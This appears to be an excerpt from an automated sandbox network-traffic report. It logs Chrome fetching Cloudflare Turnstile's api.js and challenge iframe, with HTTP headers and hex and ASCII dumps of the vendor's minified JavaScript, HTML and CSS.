                                        2024-12-17 14:45:53 UTC1369INData Raw: 7c 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d
                                        Data Ascii: |Reflect.construct.sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,u,g){var h=
                                        2024-12-17 14:45:53 UTC1369INData Raw: 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29
                                        Data Ascii: );var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))
                                        2024-12-17 14:45:53 UTC1369INData Raw: 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65
                                        Data Ascii: ent.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.2.1749705104.18.94.414433892C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-17 14:45:54 UTC383OUTGET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-12-17 14:45:55 UTC471INHTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 14:45:55 GMT
                                        Content-Type: application/javascript; charset=UTF-8
                                        Content-Length: 47692
                                        Connection: close
                                        accept-ranges: bytes
                                        last-modified: Tue, 10 Dec 2024 17:31:41 GMT
                                        cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                        access-control-allow-origin: *
                                        cross-origin-resource-policy: cross-origin
                                        Server: cloudflare
                                        CF-RAY: 8f37b31c6c68728d-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-12-17 14:45:55 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                        Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                        2024-12-17 14:45:55 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                        Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                        2024-12-17 14:45:55 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                        Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                        2024-12-17 14:45:55 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                        Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(fu
                                        2024-12-17 14:45:55 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                        Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                        2024-12-17 14:45:55 UTC1369INData Raw: 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65
                                        Data Ascii: e==="auto"||Nr.test(e)}function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._de
                                        2024-12-17 14:45:55 UTC1369INData Raw: 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 70 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53
                                        Data Ascii: /rcv").concat(o,"/").concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(p)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES
                                        2024-12-17 14:45:55 UTC1369INData Raw: 7c 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d
                                        Data Ascii: |Reflect.construct.sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,u,g){var h=
                                        2024-12-17 14:45:55 UTC1369INData Raw: 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29
                                        Data Ascii: );var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))
                                        2024-12-17 14:45:55 UTC1369INData Raw: 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65
                                        Data Ascii: ent.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        4192.168.2.1749706104.18.95.414433892C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-17 14:45:54 UTC794OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/mwsoc/0x4AAAAAAA0AZ98IMQtWtTui/auto/fbE/normal/auto/ HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-platform: "Windows"
                                        Upgrade-Insecure-Requests: 1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: navigate
                                        Sec-Fetch-Dest: iframe
                                        Referer: https://sqcconnect.com/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-12-17 14:45:55 UTC1362INHTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 14:45:55 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 26809
                                        Connection: close
                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                        content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                        cross-origin-embedder-policy: require-corp
                                        cross-origin-opener-policy: same-origin
                                        cross-origin-resource-policy: cross-origin
                                        origin-agent-cluster: ?1
                                        accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                        critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                        referrer-policy: same-origin
                                        document-policy: js-profiling
                                        2024-12-17 14:45:55 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 33 37 62 33 31 63 36 62 30 38 31 61 34 38 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                        Data Ascii: Server: cloudflareCF-RAY: 8f37b31c6b081a48-EWRalt-svc: h3=":443"; ma=86400
                                        2024-12-17 14:45:55 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                        Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                        2024-12-17 14:45:55 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                        Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                        2024-12-17 14:45:55 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                        Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
